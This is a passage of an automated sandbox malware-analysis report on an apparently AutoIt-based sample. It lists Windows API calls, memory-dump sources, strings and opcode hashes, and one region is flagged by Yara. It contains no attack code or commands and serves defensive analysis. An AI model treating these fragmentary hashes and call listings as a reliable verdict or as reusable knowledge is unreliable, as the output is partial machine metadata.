                                      • Opcode Fuzzy Hash: 1095a154aa4a40bcabffa47e32005461f9a11224652f8192c9f25d1509c889b7
                                      • Instruction Fuzzy Hash: 7A619275A00219AFCB14EF98C891EAEB7B5FF48314F118059F906EB391DB70AE81CB51
                                      APIs
                                      • Sleep.KERNEL32(00000000), ref: 0080E01E
                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 0080E037
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: GlobalMemorySleepStatus
                                      • String ID: @
                                      • API String ID: 2783356886-2766056989
                                      • Opcode ID: cc997e6cc60ea9a7dc7d06503d36390fe12df6cadddb48b9e9d6ebd48a7b0908
                                      • Instruction ID: 07fd105aba4d681eeea38bf9c9777b72b0d8d121b5fd9ee81ff601a4b3ac902b
                                      • Opcode Fuzzy Hash: cc997e6cc60ea9a7dc7d06503d36390fe12df6cadddb48b9e9d6ebd48a7b0908
                                      • Instruction Fuzzy Hash: ED5159B24087449BE360AF54EC85BABB7E8FB84314F41484DF2D8811A1DB7195698B27
                                      APIs
                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00888186
                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0088819B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: '
                                      • API String ID: 3850602802-1997036262
                                      • Opcode ID: ea57c0e2d60392eb0395934f38be57ca756410861a13935b09e9ac86040ff8cd
                                      • Instruction ID: d6d7bccd248c858159ac0f3d124d706cca55a61755d93adc2fa1480f93aa4063
                                      • Opcode Fuzzy Hash: ea57c0e2d60392eb0395934f38be57ca756410861a13935b09e9ac86040ff8cd
                                      • Instruction Fuzzy Hash: 29410878A0120ADFDB14DF68C885BDABBB5FF08300F50016AE904EB351DB71A956CF90
                                      APIs
                                      • _memset.LIBCMT ref: 00872C6A
                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00872CA0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: CrackInternet_memset
                                      • String ID: |
                                      • API String ID: 1413715105-2343686810
                                      • Opcode ID: bba8bfb7d663cd39e953909f317680457720ee6ee70f3dbcca7850db974cd00c
                                      • Instruction ID: 3cfff80ff41f60bb4bfad0b390578c57f4cccd822464285b692e79dbcf220832
                                      • Opcode Fuzzy Hash: bba8bfb7d663cd39e953909f317680457720ee6ee70f3dbcca7850db974cd00c
                                      • Instruction Fuzzy Hash: E8315D71C00119ABCF11EFA5DC85AEEBFB9FF04304F104019F928E6266DB319A56DBA1
                                      APIs
                                      • DestroyWindow.USER32(?,?,?,?), ref: 0088713C
                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00887178
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$DestroyMove
                                      • String ID: static
                                      • API String ID: 2139405536-2160076837
                                      • Opcode ID: 383e88ef3aee5ac857123963b3f630408cee660a1e3f79cb584de62c2483c255
                                      • Instruction ID: 24738fe15c72b423a10889099ed3bf9f727cd6427fdfefb7cb03d4b55ba71f99
                                      • Opcode Fuzzy Hash: 383e88ef3aee5ac857123963b3f630408cee660a1e3f79cb584de62c2483c255
                                      • Instruction Fuzzy Hash: 47316B75100604AEEB10AF68CC84AFB77B9FF88764F209619F9A5C7191DA31AC81CB60
                                      APIs
                                      • _memset.LIBCMT ref: 008630B8
                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008630F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 5ddb13cc96c46a5daa3a1a26968288f7ed1db2019ea71fb8617c5dff6d5df007
                                      • Instruction ID: 5e1e0d432f09290f8b169a25e49415eee094cc3cef43ad76d8e48dea3b8dd9fa
                                      • Opcode Fuzzy Hash: 5ddb13cc96c46a5daa3a1a26968288f7ed1db2019ea71fb8617c5dff6d5df007
                                      • Instruction Fuzzy Hash: 2531D231600309EBEB258F58D885FAEBBF8FF06350F154019F985E61A2E7709B84CB51
                                      APIs
                                      • __snwprintf.LIBCMT ref: 00874132
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __snwprintf_memmove
                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                      • API String ID: 3506404897-2584243854
                                      • Opcode ID: 3cb6255bd96f57929afcd982ba0a8ac876a84ef86c82415955c84d0b24fb1f2a
                                      • Instruction ID: 66cae00dc06471271666d24ffb108d58201490d6fd2bc4cf2f51aa08b8f25d9d
                                      • Opcode Fuzzy Hash: 3cb6255bd96f57929afcd982ba0a8ac876a84ef86c82415955c84d0b24fb1f2a
                                      • Instruction Fuzzy Hash: 99218230A0021CABCF14EF68C885AEE7BA9FF54740F844454F919E7241DB74E985DBA2
                                      APIs
                                      • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,03CCA3BA), ref: 03CCA362
                                      • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,03CCA3BA), ref: 03CCA368
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DateFormatLocaleThread
                                      • String ID: yyyy
                                      • API String ID: 3303714858-3145165042
                                      • Opcode ID: db0d694c26d069e9fd3d847f2dba49efe346fcc014920b06be282c656dbd51cd
                                      • Instruction ID: 5a136e3063016fcc2031fa4a2c561987c578106c3111c4e4fc6f3aebabe7fb18
                                      • Opcode Fuzzy Hash: db0d694c26d069e9fd3d847f2dba49efe346fcc014920b06be282c656dbd51cd
                                      • Instruction Fuzzy Hash: 6921717CA2029CAFDB15EBA5C965AAEB3A8EF48300F5640ADEC05DB350D670DE40D761
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00886D86
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00886D91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 2fbf275ee444a595bf814177a9176863e4ae69cd2aa31129a371d6f277def99e
                                      • Instruction ID: fdd751d079116a4056cfd5384aa9d8f5a9f3dd21b83ea9174d454321b575922d
                                      • Opcode Fuzzy Hash: 2fbf275ee444a595bf814177a9176863e4ae69cd2aa31129a371d6f277def99e
                                      • Instruction Fuzzy Hash: 92118271310209BFEF11AF54DC81EFB3B6AFB84364F114129F918DB290E676AC618B60
                                      APIs
                                        • Part of subcall function 00802111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0080214F
                                        • Part of subcall function 00802111: GetStockObject.GDI32(00000011), ref: 00802163
                                        • Part of subcall function 00802111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0080216D
                                      • GetWindowRect.USER32(00000000,?), ref: 00887296
                                      • GetSysColor.USER32(00000012), ref: 008872B0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 59a7e03ceace17a9d2ad13a39238ea482b8b29135fe41c262f46615a9832dd1e
                                      • Instruction ID: 3c061367c6dfe12228bded46c4604a91c146360b18caf02b8f2fb894a263ea59
                                      • Opcode Fuzzy Hash: 59a7e03ceace17a9d2ad13a39238ea482b8b29135fe41c262f46615a9832dd1e
                                      • Instruction Fuzzy Hash: 8321367261420AAFDB04EFA8CC45AEA7BB8FB48304F144519FD55D3250D734E8519B50
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00886FC7
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00886FD6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 4f2e2d2654da4cda48c43c1c0a6cd2ec2d453555f148b2f02496a60b06d91ae6
                                      • Instruction ID: 5da086b7ca5ca5ab8dbe577a081ebdc000c9070e87ca8fcd6c0b2869fd0af78c
                                      • Opcode Fuzzy Hash: 4f2e2d2654da4cda48c43c1c0a6cd2ec2d453555f148b2f02496a60b06d91ae6
                                      • Instruction Fuzzy Hash: CA113D71500209AFEB11AE64AC84EAB3B6AFB05368F104714FA64D71E0EB75EC619B60
                                      APIs
                                      • _memset.LIBCMT ref: 008631C9
                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 008631E8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 7444bbc1c165bedb73946372d2e49d99ecff6c84ce0e4006b1e1c60addcc3fe1
                                      • Instruction ID: 85ba93c9334dcbedd7eabf3413aaf4d216d52f3048dd6ec81c1deea11001abeb
                                      • Opcode Fuzzy Hash: 7444bbc1c165bedb73946372d2e49d99ecff6c84ce0e4006b1e1c60addcc3fe1
                                      • Instruction Fuzzy Hash: DC11DD31900228ABDB20DA98DC45FADB7B8FB06310F16012AF956E72A0D770AF05CB91
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 008728F8
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00872921
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 152d4be9b3ad78275f82c8b43b71934a0cdcbc207670da025360022f5481fc16
                                      • Instruction ID: 4805de80390b3fd32266792ff948e08724d66df483d3929ebff2d435f0858a97
                                      • Opcode Fuzzy Hash: 152d4be9b3ad78275f82c8b43b71934a0cdcbc207670da025360022f5481fc16
                                      • Instruction Fuzzy Hash: D411E370501229BAEB248F518C88EF7FFACFF05364F10C13AF95982100E3719990DAE1
                                      APIs
                                        • Part of subcall function 008786E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0087849D,?,00000000,?,?), ref: 008786F7
                                      • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008784A0
                                      • htons.WSOCK32(00000000,?,00000000), ref: 008784DD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWidehtonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 2496851823-2422070025
                                      • Opcode ID: 71ce419d111c59fb8957c846f453b2a201f67656809d2295fc8f8681b92e0648
                                      • Instruction ID: e2d5c4d779969aafc43b6e28944030afc42e832fa05b2d84b262582fecc77207
                                      • Opcode Fuzzy Hash: 71ce419d111c59fb8957c846f453b2a201f67656809d2295fc8f8681b92e0648
                                      • Instruction Fuzzy Hash: 3411A53524021AABDB20AF64DC4AFEEB768FF04320F108516FA19D7291DB71E854CA99
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00859A2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 6aeeae9f236d9f84dcaf9cd98837c0fcfb77771a22cf7f77a0aa16c38a1fafb4
                                      • Instruction ID: f7005a175e3ec4b7cc8f15f6816bb24d5630038b8859eb28b437d94640305c8c
                                      • Opcode Fuzzy Hash: 6aeeae9f236d9f84dcaf9cd98837c0fcfb77771a22cf7f77a0aa16c38a1fafb4
                                      • Instruction Fuzzy Hash: 8801DE71A42228AB8F14EBA8CC56CFE7769FF56360B000609FCB2D33C1EA30594C9661
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __fread_nolock_memmove
                                      • String ID: EA06
                                      • API String ID: 1988441806-3962188686
                                      • Opcode ID: 7eac2640f7277005782a46e63dc33392eb15e5290b9bd08dae75d598c8f629d6
                                      • Instruction ID: 29ce31809a6c94d3794960759cd3736080b28a2fabae1684e6ccd593c4e955e4
                                      • Opcode Fuzzy Hash: 7eac2640f7277005782a46e63dc33392eb15e5290b9bd08dae75d598c8f629d6
                                      • Instruction Fuzzy Hash: 5301F9728042687EDB28C6A8C856EFE7BFCEB11301F00419AF592D66C1E5B4E6048760
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00859923
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: 71270297c5dcabd01705e4172146904169fe3e2182e2ed134010a4c7eaa8a9ce
                                      • Instruction ID: 2fd22394b06fb267367030b56698743b549f50684653e24ecb24c9f5ce4f38ef
                                      • Opcode Fuzzy Hash: 71270297c5dcabd01705e4172146904169fe3e2182e2ed134010a4c7eaa8a9ce
                                      • Instruction Fuzzy Hash: EF01D472A41108ABCF14EBA4C956EFE77ADFF15340F100019FD51E3281EA105F0C96B2
                                      APIs
                                        • Part of subcall function 00829BDC: __getptd_noexit.LIBCMT ref: 00829BDD
                                      • __lock.LIBCMT ref: 00829673
                                      • _free.LIBCMT ref: 008296A0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __getptd_noexit__lock_free
                                      • String ID: `
                                      • API String ID: 1533244847-4168407445
                                      • Opcode ID: 84d177bcc556d45b7202bf1fa7d59ed25d1a7a2942e2b3b747852b4cf7e0547c
                                      • Instruction ID: f6e1fc546e3158abd7c600e94bfbd87f7f30e9d2dc93ce8606f56c6616441151
                                      • Opcode Fuzzy Hash: 84d177bcc556d45b7202bf1fa7d59ed25d1a7a2942e2b3b747852b4cf7e0547c
                                      • Instruction Fuzzy Hash: EB113C76D01632EBCB21AF6CA801A59B7F0FF54B60F15411AE894E3290CB3459828FC6
                                      APIs
                                        • Part of subcall function 00811A36: _memmove.LIBCMT ref: 00811A77
                                        • Part of subcall function 0085B79A: GetClassNameW.USER32(?,?,000000FF), ref: 0085B7BD
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 008599A6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameSend_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 372448540-1403004172
                                      • Opcode ID: b12e43945002b3d316b2013373a479a34972f370d3b16a38d823de30bc704d2d
                                      • Instruction ID: 6a9884edb463655f1e980f3568cf75913973ebeba50709ea7058cd2c3f534390
                                      • Opcode Fuzzy Hash: b12e43945002b3d316b2013373a479a34972f370d3b16a38d823de30bc704d2d
                                      • Instruction Fuzzy Hash: 6001A772A41118A7CF14EBA8C916EFE7BADFF15341F140019FD85E3281DA155F4C96B2
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp
                                      • String ID: #32770
                                      • API String ID: 2292705959-463685578
                                      • Opcode ID: 5803b9df59cb8a3da549033cca55abab72cff600f58b0aa3ca84cb971d8f8a4a
                                      • Instruction ID: b2f63f46e20b806c5cdc0d4850a55f7135e908baa2f0a6e64d56fb4812de4a1b
                                      • Opcode Fuzzy Hash: 5803b9df59cb8a3da549033cca55abab72cff600f58b0aa3ca84cb971d8f8a4a
                                      • Instruction Fuzzy Hash: E8E09B725002296BD710A699AC49E97F7ACFB55771F000057B904D6151D5A0994587D1
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 008588A0
                                        • Part of subcall function 00823588: _doexit.LIBCMT ref: 00823592
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
